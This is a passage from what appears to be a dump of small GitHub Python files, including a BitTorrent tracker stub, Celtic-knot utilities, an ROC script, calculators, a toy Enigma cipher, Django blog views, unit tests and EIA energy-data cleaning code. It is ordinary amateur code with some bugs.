ABCMeta, abstractmethod\n\n\nclass Tracker(metaclass=ABCMeta):\n\n    def __init__(self, url, port, torrent, peer_id):\n        self.url = url\n        self.port = port\n        self.torrent = torrent\n        self.peer_id = peer_id\n\n    @abstractmethod\n    def peers(self):\n        raise NotImplementedError(\"This method needs to be implemented\")\n","repo_name":"vtemian/university_projects","sub_path":"data_structures/bitorrent/client/trackers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30378058671","text":"import math\nimport config\n\ndef initialiseCrossings():\n    for i in range(2*config.xsize+1):\n        config.crossings.append([])\n        for j in range(2*config.ysize+1):\n            config.crossings[i].append(0)\n    \n    for i in range(2*config.ysize+1):\n        config.crossings[config.xsize][i] = 8+4\n        config.crossings[-config.xsize][i] = 2+1\n    for i in range(2*config.xsize+1):\n        config.crossings[i][config.ysize] = 8+2\n        config.crossings[i][-config.ysize] = 4+1\n    \ndef symmetriseWalls():\n    a = set()\n    for w in config.walls:\n        a.add((w[0],-w[1],w[2]))\n        a.add((-w[0],-w[1],w[2]))\n        a.add((-w[0],w[1],w[2]))\n    for b in a:\n        config.walls.add(b)\n\ndef symmetriseIgnores():\n    a = set()\n    for i in config.ignoreCrossings:\n        a.add((i[0],-i[1]))\n        a.add((-i[0],-i[1]))\n        a.add((-i[0],i[1]))\n    for b in a:\n        config.ignoreCrossings.add(b)\n\ndef nearCrossing(p):\n    '''Are we plus or minus 1 from a crossing?'''\n    x = p.x%(config.grid/2)\n    y = p.y%(config.grid/2)\n    if x == config.step or x == config.grid/2 - config.step or y == config.step or y == config.grid/2 - config.step:\n        return True\n    return False\n\ndef atCrossing(p):\n    '''Are we at a crossing?'''\n    x = p.x%(config.grid/2)\n    y = p.y%(config.grid/2)\n    if x == 0 or y == 0:\n        return True\n    return False\n    \ndef getCrossing(p):\n    '''Get the nearest half-grid coordinate.'''\n    return int((p.x + config.grid/4)//(config.grid/2)), int((p.y + config.grid/4)//(config.grid/2))\n\ndef crossingType(p):\n    '''Get the crossing type of the nearest half-grid coordinate.\n    Returns 0 for a wall, 1 for main diagonal over, -1 for main diagonal under.'''\n    w = getWall(p)\n    if w:\n        return 0\n    gx,gy = getCrossing(p)\n    if abs(gx) 
== config.xsize:\n return 0\n if abs(gy) == config.ysize:\n return 0\n if gx%2 == 1:\n return 1\n return -1\n\ndef getWall(p):\n '''Get the wall at the given crossing.'''\n gx,gy = getCrossing(p)\n if abs(gx) == config.xsize:\n # Vertical edge\n return [gx,gy,1]\n if abs(gy) == config.ysize:\n # Horizontal edge\n return [gx,gy,0]\n for w in config.walls:\n if gx == w[0] and gy == w[1]:\n return w\n return False\n\ndef newStrand():\n for i in range(len(config.crossings)):\n x = (i + config.xsize)%(2*config.xsize+1) - config.xsize\n for j in range(len(config.crossings[i])):\n y = (j + config.ysize)%(2*config.ysize+1) - config.ysize\n if (x + config.xsize + y + config.ysize)%2 == 1:\n if config.crossings[i][j] != 15 and not (x,y) in config.ignoreCrossings:\n p = PVector(x * config.grid/2, y * config.grid/2)\n a = config.crossings[i][j]\n if config.crossings[i][j] & 1 != 1:\n v = PVector(-5,-5)\n config.crossings[i][j] |= 1\n elif config.crossings[i][j] & 2 != 2:\n v = PVector(-5,5)\n config.crossings[i][j] |= 2\n elif config.crossings[i][j] & 4 != 4:\n v = PVector(5,-5)\n config.crossings[i][j] |= 4\n elif config.crossings[i][j] & 8 != 8:\n v = PVector(5,5)\n config.crossings[i][j] |= 8\n return p,v\n return False, False\n","repo_name":"loopspace/Processing-Celtic","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5622900587","text":"#imports necessary packages\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plot\n\n\n#_____________________beginning of user input______________________________\n#specify the folder containing ROC_data.csv and the desired name for the spreadsheet that is outputted\nPATH='/hard drive/experiment folder/'\nfile_input = PATH+'ROC_data.csv'\nfile_ouput = PATH+'ROC_table.csv'\n\n#Just include high confidence aggregates? 
select either 'yes' or 'no'\nhigh_con = 'no'\n#specify the upper bound of CV values to assess\nupper_bound = 2\n#specify the number of CV thresholds between 0 and the upper bound to test\nbreaks = 200\n#specify fluorescent channel\nchannel = 'Cy5'\n#specify timepoint\ntimepoint = 1\n#_____________________end of user input______________________________\n\n#imports ROC_data.csv\ndf = pd.read_csv(file_input)\n\n#counts the number of cells without aggregates\nno_agg_num = len(list(df['aggregate'][df['aggregate'] == 0]))\n#counts the number of cells with aggregates\naggs_num = len(list(df['aggregate'][df['aggregate'] > 0]))\n#counts the number of cells with high confidence aggregates\nhigh_con_aggs_num = len(list(df['aggregate'][df['aggregate'] == 2]))\n\n#creates a list of all CV threshold values\nthresh_list = [x*upper_bound/(breaks) for x in range(breaks)]\nthresh_list.append(upper_bound)\n\n#creates a new dataframe called df_ROC\ndf_ROC = pd.DataFrame()\n#adds the thresh_list as a column to df_ROC\ndf_ROC['threshold'] = thresh_list\n\n#creates subsetted dataframes containing either no aggregates, all aggregates, or high-confidence aggregates\ndf_no_agg = df[df['aggregate'] == 0]\ndf_agg = df[df['aggregate'] > 0]\ndf_high_con = df[df['aggregate'] == 2]\n\n#creates lists that count how many cells have a CV value below each threshold value\nno_aggs_list = [df_no_agg[channel+'-CV-'+str(timepoint)][df_no_agg[channel+'-CV-'+str(timepoint)] 100:\n            miles = miles - 100\n            amount = (60 * days_int) + ((0.25 * miles)*days_int)\n            r_amount = round(amount,1)\n        else:\n            amount = (60 * days_int)\n            r_amount = round(amount,1)\n        print(\"Amount due: \",r_amount)\n        # ask again whether the user wants to continue, so the while loop does not run forever\n        con = input(\"Would you like to continue (y/n)? \")\n","repo_name":"Yazminlilja/Vika3-forritun","sub_path":"Skilaverkefni/car_rental.py","file_name":"car_rental.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"is","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36896407365","text":"from nose.tools import eq_, ok_\n\nfrom canon_set import CanonicalSet\nfrom cyclic_cache import CyclicCacheFactory\n\nCACHE_SIZE = 4\n\nclass TestCanonicalSet(object):\n    \"\"\"\n    Test CanonicalSet. 
Currently hints are unsupported.\n    \"\"\"\n    @classmethod\n    def setup_class(cls):\n        cls.cf = CyclicCacheFactory(CACHE_SIZE)\n\n    def setup(self):\n        self.cs = CanonicalSet(0,self.cf)\n\n    def test_get_canonical(self):\n        \"\"\"\n        Test that get_canonical works.\n        \"\"\"\n        eq_(self.cs.get_canonical(),0)\n\n    def test_new_canon(self):\n        \"\"\"\n        Test that new_canon changes the canonical element properly.\n        \"\"\"\n        eq_(self.cs.get_canonical(),0)\n        self.cs.new_canon(1)\n        eq_(self.cs.get_canonical(),1)\n\n    def test_clean_div(self):\n        \"\"\"\n        Test that a div for a one-element set works.\n        \"\"\"\n        div1 = self.cs / (lambda x: x == 0)\n        eq_(len(div1),1)\n        ok_(True in div1)\n        eq_(div1[True].get_canonical(),0)\n        div2 = self.cs / (lambda x: x)\n        eq_(len(div2),1)\n        ok_(0 in div2)\n        eq_(div2[0].get_canonical(),0)\n\n    def test_same_div(self):\n        \"\"\"\n        Test that a div for a multi-element set, with all items in the same\n        partition, works.\n        \"\"\"\n        self.cs.append_sample(1)\n        div1 = self.cs / (lambda x: x != 3)\n        eq_(len(div1),1)\n        ok_(True in div1)\n        eq_(div1[True].get_canonical(),0)\n\n    def test_different_div(self):\n        \"\"\"\n        Test that a div for a multi-element set, with items in different\n        partitions, works.\n        \"\"\"\n        self.cs.append_sample(3)\n        div1 = self.cs / (lambda x: x != 3)\n        eq_(len(div1),2)\n        ok_(True in div1)\n        ok_(False in div1)\n        eq_(div1[True].get_canonical(),0)\n        eq_(div1[False].get_canonical(),3)\n        self.cs.append_sample(1)\n        div2 = self.cs / (lambda x: x)\n        eq_(len(div2),3)\n        for i in [0,1,3]:\n            ok_(i in div2)\n            eq_(div2[i].get_canonical(),i)\n","repo_name":"amosonn/equiv_partition","sub_path":"tests/test_canon_set.py","file_name":"test_canon_set.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11974033496","text":"from django.shortcuts import render, get_object_or_404\nfrom blogapp.form import CommentForm\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\n\n# Create your views here.\nfrom blogapp.models import Blog\n\n\ndef home(request):\n    blogs = Blog.objects.all()\n    context = {\n        \"blogs\":blogs\n    }\n    return render(request, \"blogapp/index.html\", context)\n\n\ndef blog(request):\n    blogs = Blog.objects.all()\n    context = {'blogs': blogs}\n    return render(request, \"blogapp/blog-posts.html\", context)\n\n\ndef blogpost(request, slug, pk):\n    form = CommentForm()\n    # post = Blog.objects.get(pk=int(pk))\n    post = get_object_or_404(Blog, pk=int(pk))\n    if request.method == \"POST\":\n        form = CommentForm(request.POST)\n        if form.is_valid():\n            com = form.save(commit=False)\n            com.blog = post\n            com.save()\n            # return HttpResponseRedirect(reverse('blogapp:blogpost'))\n    context = {\n        'post':post\n    }\n    return render(request, 'blogapp/blog-post-details.html', context)\n","repo_name":"goodieboy/blog","sub_path":"blogapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42949483155","text":"import sys\r\nimport json\r\nimport unittest\r\n\r\nsys.path.append('../..')\r\nfrom api import *\r\n\r\nclass TestFunctions(unittest.TestCase):\r\n    def setUp(self):\r\n        app.app.config['TESTING'] = True\r\n        self.app = app.app.test_client()\r\n    # Test of Output function\r\n    \r\n    def test_output(self):\r\n        with app.test_request_context():\r\n            out = output('true','cleartext', '1234','true', '[]')\r\n            response = [\r\n                {\r\n                    'active': 'true',\r\n                
'authentication_method': 'cleartext',\r\n 'password': '1234',\r\n 'authenticated': 'false',\r\n 'roles': '[]'\r\n }\r\n ]\r\n data = json.loads(out.get_data(as_text=True))\r\n # Assert response\r\n self.assertEqual(data['response'], response)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()","repo_name":"erikkgagewhitt/Wiki440","sub_path":"__tests__/json_api_test.py","file_name":"json_api_test.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28569883650","text":"\"\"\"\nEnigma Cipher program\nEncipher a text file using Enigma Cipher\nNumber of rotors can be specified\nRotors can be used in different positions\n\n++Date created: 12/21/2016\n++Author: Bao Thai - btt4530@g.rit.edu\n\"\"\"\nfrom RotorBox import ROTORS\nfrom MirrorBox import MIRRORS\nfrom sys import argv\n\n#Array holding alphabet letters\nALPHABET = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n\n#print(ROTORS[1][ALPHABET.index(\"A\")])\n#print(MIRRORS[0][1])\n\n\"\"\"\nFind the input to a rotor that gives the specified output\nParam: rotor: investigated rotor\n\t shift: shift of said rotor (0-26)\n\t output: output to find the input\nOutput: The input that gives the specified output (inverse function)\n\"\"\"\ndef findInput(rotor,shift,output):\n\tcurrent_rotor = rotor\n\tcount = 0 \n\twhile count < len(rotor):\n\t\tpos = (count + shift)%26 #which shift are being used \n\t\tout_check = (count + rotor[pos])%26 #output of current count\n\t\tif out_check < 0: \n\t\t\tout_check = 26 + out_check\n\t\tif out_check == output:\n\t\t\treturn count\n\t\tcount = count + 1\n\n\n\"\"\"\nEncode a line using Enigma\nParam: num_rotor: how many rotors are used\n\t carry_num\n\"\"\"\ndef encodeEnigma(num_rotor,lines):\n\t#Variable declaration\n\tarr_result = []\n\trotors = [] #rotors placed in the machine\n\tarr_shifts = [] #shift for each rotor\n\tarr_modulo = [] #get the modulo for your rotors\n\tnum = 0 #general counter variable\n\tmirror = MIRRORS[0] #mirror to be placed in machine\n\t\n\t#Getting user's setup\n\twhile num < num_rotor:\n\t\tstring_1 = \"Select a rotor from 0 to \" + str(len(ROTORS)-1) + \" for Rotor #\" + str(num+1) + \":>\"\n\t\trotor = int(input(string_1)) \n\t\trotors.append(ROTORS[rotor])\n\t\tstring_2 = \"Init shift of Rotor #\" + str(num+1) + \":>\"\n\t\tshift = int(input(string_2))\n\t\tarr_shifts.append(shift)\n\t\t#Set up the modulo in fibonacci sequence ;)\n\t\tif num == 0:\n\t\t\tarr_modulo.append(1)\n\t\tif num == 1:\n\t\t\tarr_modulo.append(2)\n\t\tif num > 1:\n\t\t\tarr_modulo.append(arr_modulo[num-1] + arr_modulo[num-2])\n\t\tnum = num + 1\n\n\tnum = 0\n\tline_count = 0\n\twhile line_count < len(lines):\n\t\ttext = lines[line_count]\n\t\t#***************#\n\t\tresult = \"\"\n\t\tplain_text = text\n\t\tplain_text = plain_text.upper()\n\t\tfor char in plain_text:\n\t\t\tif char.isalpha():\n\t\t\t\tprint(char)\n\t\t\t\tencoded_num = ALPHABET.index(char)\n\t\t\t\trotor_count = 0\n\t\t\t\t#encode through rotor\n\t\t\t\twhile rotor_count < len(rotors):\n\t\t\t\t\trotor = rotors[rotor_count] #get the rotor\n\t\t\t\t\tshift = (arr_shifts[rotor_count] + encoded_num)%26 #get the corresponding shift\n\t\t\t\t\tencoded_num = (encoded_num + rotor[shift])%26\n\t\t\t\t\tif encoded_num < 0: \n\t\t\t\t\t\tencoded_num = 26 + encoded_num\n\t\t\t\t\trotor_count = rotor_count+1\n\t\t\t\t\tprint(\"Encode: \"+ALPHABET[encoded_num])\n\t\t\t\t#encode 
mirror\t\n\t\t\t\tencoded_num = mirror[(encoded_num)%26]\n\t\t\t\tprint(\"Mirror: \"+ALPHABET[encoded_num])\n\t\t\t\t#going up the rotors idea: use index of, be very careful of shifts\n\t\t\t\trotor_count = len(rotors) - 1\n\t\t\t\twhile rotor_count >= 0: \n\t\t\t\t\trotor = rotors[rotor_count] #get the rotor\n\t\t\t\t\tencoded_num = findInput(rotor,arr_shifts[rotor_count],encoded_num)\n\t\t\t\t\trotor_count = rotor_count - 1\n\t\t\t\t\tprint(\"Up: \"+ALPHABET[encoded_num])\n\t\t\t\tchar = ALPHABET[encoded_num]\n\t\t\t\t#Set the shifts for the rotors for next char\n\t\t\t\trotor_count = 0\n\t\t\t\twhile rotor_count < len(arr_shifts):\n\t\t\t\t\tif num % arr_modulo[rotor_count] == 0:\n\t\t\t\t\t\tarr_shifts[rotor_count] = (arr_shifts[rotor_count] + 1)%26\n\t\t\t\t\trotor_count = rotor_count+1\n\t\t\t\tprint(arr_shifts)\n\n\t\t\t\tnum = num + 1\n\t\t\tresult += char\n\t\tarr_result.append(result)\n\t\tline_count = line_count + 1\n\treturn arr_result\n\ndef main():\n\tscript, plain_file, encoded_file, num_rotor = argv\n\tplain = open(plain_file,\"r\")\n\tencoded = open(encoded_file,\"w+\")\n\trotor_count = int(num_rotor)\n\t\n\tinput_lines = []\n\toutput_lines = []\n\tfor line in plain:\n\t\tinput_lines.append(line)\n\toutput_lines = encodeEnigma(rotor_count,input_lines)\n\tfor line in output_lines:\n\t\tencoded.write(line)\n\tplain.close()\n\tencoded.close()\n\tprint(\"Done!\")\n\nif __name__ == '__main__':\n main()\n ","repo_name":"thaitribao/Cipher_Scripts","sub_path":"Enigma/Enigma.py","file_name":"Enigma.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12675598944","text":"from tkinter import *\r\n\r\nroot = Tk()\r\nroot.title('A calculator by anukul')\r\n\r\ne = Entry(root, width=35, borderwidth=5)\r\ne.grid(row=0, column=0, columnspan=3)\r\n\r\n\r\ndef button_click(number):\r\n current = e.get()\r\n e.delete(0, END)\r\n\r\n e.insert(0, str(current) + str(number))\r\n\r\n\r\ndef button_clear():\r\n e.delete(0, END)\r\n\r\n\r\ndef button_add():\r\n global sign\r\n sign = '+'\r\n first_number = e.get()\r\n global f_num\r\n f_num = int(first_number)\r\n e.delete(0, END)\r\n\r\n\r\ndef button_sub():\r\n global sign\r\n sign = '-'\r\n first_number = e.get()\r\n global f_num\r\n f_num = int(first_number)\r\n e.delete(0, END)\r\n\r\n\r\ndef button_div():\r\n global sign\r\n sign = '/'\r\n first_number = e.get()\r\n global f_num\r\n f_num = float(first_number)\r\n e.delete(0, END)\r\n\r\n\r\ndef button_multiply():\r\n global sign\r\n sign = '*'\r\n first_number = e.get()\r\n global f_num\r\n f_num = int(first_number)\r\n e.delete(0, END)\r\n\r\n\r\ndef button_equal():\r\n second_number = e.get()\r\n if sign == '+':\r\n e.delete(0, END)\r\n\r\n e.insert(0, int(f_num) + int(second_number))\r\n\r\n if sign == '-':\r\n e.delete(0, END)\r\n\r\n e.insert(0, int(f_num) - int(second_number))\r\n if sign == '*':\r\n e.delete(0, END)\r\n\r\n e.insert(0, int(f_num) * int(second_number))\r\n if sign == '/':\r\n e.delete(0, END)\r\n\r\n e.insert(0, float(f_num) / float(second_number))\r\n\r\n\r\nbutton_1 = Button(root, text='1', padx=40, pady=20, command=lambda: button_click(1),fg='red')\r\nbutton_2 = Button(root, text='2', padx=40, pady=20, command=lambda: button_click(2),fg='red')\r\nbutton_3 = Button(root, text='3', padx=40, pady=20, command=lambda: button_click(3),fg='red')\r\nbutton_4 = Button(root, text='4', padx=40, pady=20, command=lambda: button_click(4),fg='red')\r\nbutton_5 = Button(root, 
text='5', padx=40, pady=20, command=lambda: button_click(5),fg='red')\r\nbutton_6 = Button(root, text='6', padx=40, pady=20, command=lambda: button_click(6),fg='red')\r\nbutton_7 = Button(root, text='7', padx=40, pady=20, command=lambda: button_click(7),fg='red')\r\nbutton_8 = Button(root, text='8', padx=40, pady=20, command=lambda: button_click(8),fg='red')\r\nbutton_9 = Button(root, text='9', padx=40, pady=20, command=lambda: button_click(9),fg='red')\r\nbutton_10 = Button(root, text='0', padx=40, pady=20, command=lambda: button_click(0),fg='red')\r\nbutton_clear = Button(root, text='AC', padx=35, pady=20, command=button_clear, bg='red', fg='black')\r\nbutton_add = Button(root, text='+', padx=40, pady=20, command=button_add,fg='red')\r\nbutton_sub = Button(root, text='-', padx=40, pady=20, command=button_sub,fg='red')\r\nbutton_div = Button(root, text='/', padx=40, pady=20, command=button_div,fg='red')\r\nbutton_multiply = Button(root, text='*', padx=40, pady=20, command=button_multiply,fg='red')\r\nbutton_equal = Button(root, text='=', padx=140, pady=20, command=button_equal, bg='blue', fg='white')\r\n\r\n# put buttons on the screen\r\nbutton_1.grid(row=3, column=0)\r\nbutton_2.grid(row=3, column=1)\r\nbutton_3.grid(row=3, column=2)\r\nbutton_4.grid(row=2, column=0)\r\nbutton_5.grid(row=2, column=1)\r\nbutton_6.grid(row=2, column=2)\r\nbutton_7.grid(row=1, column=0)\r\nbutton_8.grid(row=1, column=1)\r\nbutton_9.grid(row=1, column=2)\r\nbutton_10.grid(row=4, column=0)\r\nbutton_clear.grid(row=4, column=2)\r\nbutton_add.grid(row=4, column=1)\r\nbutton_sub.grid(row=5, column=0)\r\nbutton_div.grid(row=5, column=1)\r\nbutton_multiply.grid(row=5, column=2)\r\n\r\nbutton_equal.grid(row=6, column=0, columnspan=3)\r\n\r\nroot.mainloop()\r\n","repo_name":"Anukul2058/python-calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30578369458","text":"import pandas as pd\nimport numpy as np\nfrom simpledbf import Dbf5\nimport math\n\ndef re_index_sixty(sixty):\n for item in sixty.items():\n headers = sixty[item[0]].iloc[0]\n sixty[item[0]] = pd.DataFrame(sixty[item[0]].values[1:], columns=headers)\n\n\ndef month_agg(sixty):\n default = sixty[1]\n for item in sixty.items():\n if item[0] > 1:\n default = default.append(item[1]).copy()\n return default\n\ndef add_month(sixty):\n for item in sixty.items():\n item[1]['Month'] = item[0]\n\ndef rename_cols(sixty):\n for item in sixty.items():\n item[1].columns = item[1].columns.str.upper()\n item[1].columns = item[1].columns.str.replace(' ', '')\n item[1].columns = item[1].columns.str.replace('-', '')\n item[1].columns = item[1].columns.str.replace('_', '')\n item[1].columns = item[1].columns.str.replace('\\\\n', '')\n item[1].columns = item[1].columns.str.replace('ENTITYID', 'UTILITYID')\n item[1].columns = item[1].columns.str.replace('ENTITYNAME', 'UTILITYNAME')\n \n \ndef drop_cols(sixty):\n for item in sixty.items():\n item[1].drop(columns=['TECHNOLOGY','PRIMEMOVERCODE', 'OPERATINGMONTH', 'OPERATINGYEAR',\n 'PLANNEDRETIREMENTMONTH', 'PLANNEDRETIREMENTYEAR', 'STATUS',\n 'PLANNEDDERATEYEAR', 'PLANNEDDERATEMONTH',\n 'PLANNEDDERATEOFSUMMERCAPACITY(MW)', 'PLANNEDUPRATEYEAR',\n 'PLANNEDUPRATEMONTH', 'PLANNEDUPRATEOFSUMMERCAPACITY(MW)', 'COUNTY','BALANCINGAUTHORITYCODE',\n 'GOOGLEMAP','BINGMAP', 'UNITCODE','SECTOR','PLANTSTATE','GENERATORID'],errors='ignore').copy()\n\ndef clean_agg_sixtys(sixtys=sixtys):\n out 
= {}\n for item in sixtys.items():\n re_index_sixty(item[1])\n rename_cols(item[1])\n add_month(item[1])\n drop_cols(item[1])\n out[item[0]] = month_agg(item[1])\n for key in out.keys():\n out[key]['DATAYEAR'] = 2000 + key\n return out\n\ndef gentype(row):\n if row['ENERGYSOURCECODE'] == 'Coal Integrated Gasification Combined Cycle' or row['ENERGYSOURCECODE'] == 'Conventional Steam Coal':\n return 'coal'\n elif row['ENERGYSOURCECODE'] == \"Natural Gas Fired Combined Cycle\" or row['ENERGYSOURCECODE'] == 'Natural Gas Fired Combustion Turbine' or row['ENERGYSOURCECODE'] == 'Natural Gas Internal Combustion Engine' \\\n or row['ENERGYSOURCECODE'] == 'Natural Gas Steam Turbine' or row['ENERGYSOURCECODE'] == 'Natural Gas with Compressed Air Storage' or row['ENERGYSOURCECODE'] == 'Other Natural Gas' or row['ENERGYSOURCECODE'] == 'Other Gases'or row['ENERGYSOURCECODE'] == 'Landfill Gas':\n return 'natural_gas'\n elif row['ENERGYSOURCECODE'] == 'Petroleum Coke' or row['ENERGYSOURCECODE'] == 'Petroleum Liquids':\n return 'oil'\n elif row['ENERGYSOURCECODE'] == 'Conventional Hydroelectric' or row['ENERGYSOURCECODE'] == 'Hydroelectric Pumped Storage':\n return 'hydroelectric'\n elif row['ENERGYSOURCECODE'] == 'Geothermal':\n return 'geothermal'\n elif row['ENERGYSOURCECODE'] == 'Onshore Wind Turbine' or row['ENERGYSOURCECODE'] == 'Offshore Wind Turbine':\n return 'wind'\n elif row['ENERGYSOURCECODE'] == 'Solar Photovoltaic' or row['ENERGYSOURCECODE'] == 'Solar Thermal with Energy Storage' or row['ENERGYSOURCECODE'] == 'Solar Thermal without Energy Storage':\n return 'solar'\n elif row['ENERGYSOURCECODE'] == 'Nuclear':\n return 'nuclear'\n elif row['ENERGYSOURCECODE'] == 'ANT' or row['ENERGYSOURCECODE'] == 'BIT' or row['ENERGYSOURCECODE'] == 'COL' or row['ENERGYSOURCECODE'] == 'COM' or row['ENERGYSOURCECODE'] == 'CWM' or row['ENERGYSOURCECODE'] == 'SUB'\\\n or row['ENERGYSOURCECODE'] == 'LIG' or row['ENERGYSOURCECODE'] == 'SGC' or row['ENERGYSOURCECODE'] == 'WC' or row['ENERGYSOURCECODE'] == 'RC':\n return 'coal'\n elif row['ENERGYSOURCECODE'] == 'BFG' or row['ENERGYSOURCECODE'] == 'NG' or row['ENERGYSOURCECODE'] == 'OG' or row['ENERGYSOURCECODE'] == 'GAS' or row['ENERGYSOURCECODE'] == 'MTH' or row['ENERGYSOURCECODE'] == 'LNG'\\\n or row['ENERGYSOURCECODE'] == 'LPG' or row['ENERGYSOURCECODE'] == 'RG' or row['ENERGYSOURCECODE'] == 'MTH' or row['ENERGYSOURCECODE'] == 'SNG' or row['ENERGYSOURCECODE'] == 'LFG':\n return 'natural_gas'\n elif row['ENERGYSOURCECODE'] == 'DFO' or row['ENERGYSOURCECODE'] == 'JF' or row['ENERGYSOURCECODE'] == 'KER' or row['ENERGYSOURCECODE'] == 'PC' or row['ENERGYSOURCECODE'] == 'PG' or row['ENERGYSOURCECODE'] == 'RFO'\\\n or row['ENERGYSOURCECODE'] == 'SGP' or row['ENERGYSOURCECODE'] == 'WO' or row['ENERGYSOURCECODE'] == 'CRU' or row['ENERGYSOURCECODE'] == 'FO1' or row['ENERGYSOURCECODE'] == 'FO2' or row['ENERGYSOURCECODE'] == 'FO3'\\\n or row['ENERGYSOURCECODE'] == 'FO4' or row['ENERGYSOURCECODE'] == 'FO5' or row['ENERGYSOURCECODE'] == 'FO6' or row['ENERGYSOURCECODE'] == 'JF' or row['ENERGYSOURCECODE'] == 'KER' or row['ENERGYSOURCECODE'] == 'PET'\\\n or row['ENERGYSOURCECODE'] == 'TOP':\n return 'oil'\n elif row['ENERGYSOURCECODE'] == 'WAT':\n return 'hydroelectric'\n elif row['ENERGYSOURCECODE'] == 'GST' or row['ENERGYSOURCECODE'] == 'GEO':\n return 'geothermal'\n elif row['ENERGYSOURCECODE'] == 'WND':\n return 'wind'\n elif row['ENERGYSOURCECODE'] == 'SUN':\n return 'solar'\n elif row['ENERGYSOURCECODE'] == 'NUC' or row['ENERGYSOURCECODE'] == 'UR':\n return 'nuclear'\n 
else:\n return 'other/unreported'\n\ndef re_index_sixtyones(sixtyones=sixtyones):\n for item in sixtyones.items():\n headers = sixtyones[item[0]].iloc[1]\n sixtyones[item[0]] = pd.DataFrame(sixtyones[item[0]].values[2:], columns=headers)\n\ndef sixtyones_drop(sixtyones=sixtyones):\n for item in sixtyones.items():\n sixtyones[item[0]] = item[1].iloc[:,[0,1,2,3,4,5,19,20,21]].copy()\n\ndef sixtyones_rename(sixtyones=sixtyones):\n for item in sixtyones.items():\n sixtyones[item[0]] = item[1].rename(columns={'THOUSANDSDOLLARS':'TOTALREVENUE','MEGAWATTHOURS':'TOTALSALES','COUNT':'TOTALCUSTOMERS'})\n \ndef sixtyones_addyear(sixtyones=sixtyones):\n for item in sixtyones.items():\n item[1]['DATAYEAR'] = 2000 + item[0]\n\ndef droplast(sixtyones=sixtyones):\n for df in sixtyones.items():\n sixtyones[df[0]] = df[1].iloc[:-1,:]\n\ndef clean_sixtyones(sixtyones=sixtyones):\n re_index_sixtyones()\n sixtyones_drop()\n rename_cols(sixtyones)\n sixtyones_rename()\n sixtyones_addyear()\n droplast()\n\ndef owntype(row):\n if row['OWNERSHIP'] == 'Municipal' or row['OWNERSHIP'] == 'MUNICIPAL' or row['OWNERSHIP'] == 'Federal' or row['OWNERSHIP'] == 'State' or row['OWNERSHIP'] == 'Political Subdivision':\n return 1\n elif row['OWNERSHIP'] == \"COOPERATIVE\" or row['OWNERSHIP'] == 'Cooperative' or row['OWNERSHIP'] == 'COOP' or row['OWNERSHIP'] == 'coop':\n return 2\n elif row['OWNERSHIP'] == 'Investor Owned':\n return 3\n elif row['OWNERSHIP'] == 'Behind the Meter':\n return 4\n else:\n return 0\n\nif __name__ == '__main__':\n sixtyone_2016_rev = pd.read_excel('../data/861m/f8262016.xls',sheet_name=0)\n sixtyone_2017_rev = pd.read_excel('../data/861m/retail_sales_2017.xlsx',sheet_name=0)\n sixtyone_2018_rev = pd.read_excel('../data/861m/retail_sales_2018.xlsx',sheet_name=0)\n sixtyone_2019_rev = pd.read_excel('../data/861m/retail_sales_2019.xlsx',sheet_name=0)\n\n yr = 2016\n sixty_2016_1 = pd.read_excel(f'../data/860m/january_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_2 = pd.read_excel(f'../data/860m/february_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_3 = pd.read_excel(f'../data/860m/march_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_4 = pd.read_excel(f'../data/860m/april_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_5 = pd.read_excel(f'../data/860m/may_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_6 = pd.read_excel(f'../data/860m/june_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_7 = pd.read_excel(f'../data/860m/july_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_8 = pd.read_excel(f'../data/860m/august_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_9 = pd.read_excel(f'../data/860m/september_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_10 = pd.read_excel(f'../data/860m/october_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_11 = pd.read_excel(f'../data/860m/november_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_12 = pd.read_excel(f'../data/860m/december_generator{yr}.xlsx',sheet_name=0)\n yr = 2017\n sixty_2017_1 = pd.read_excel(f'../data/860m/january_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_2 = pd.read_excel(f'../data/860m/february_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_3 = pd.read_excel(f'../data/860m/march_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_4 = pd.read_excel(f'../data/860m/april_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_5 = pd.read_excel(f'../data/860m/may_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_6 = pd.read_excel(f'../data/860m/june_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_7 = pd.read_excel(f'../data/860m/july_generator{yr}.xlsx',sheet_name=0)\n 
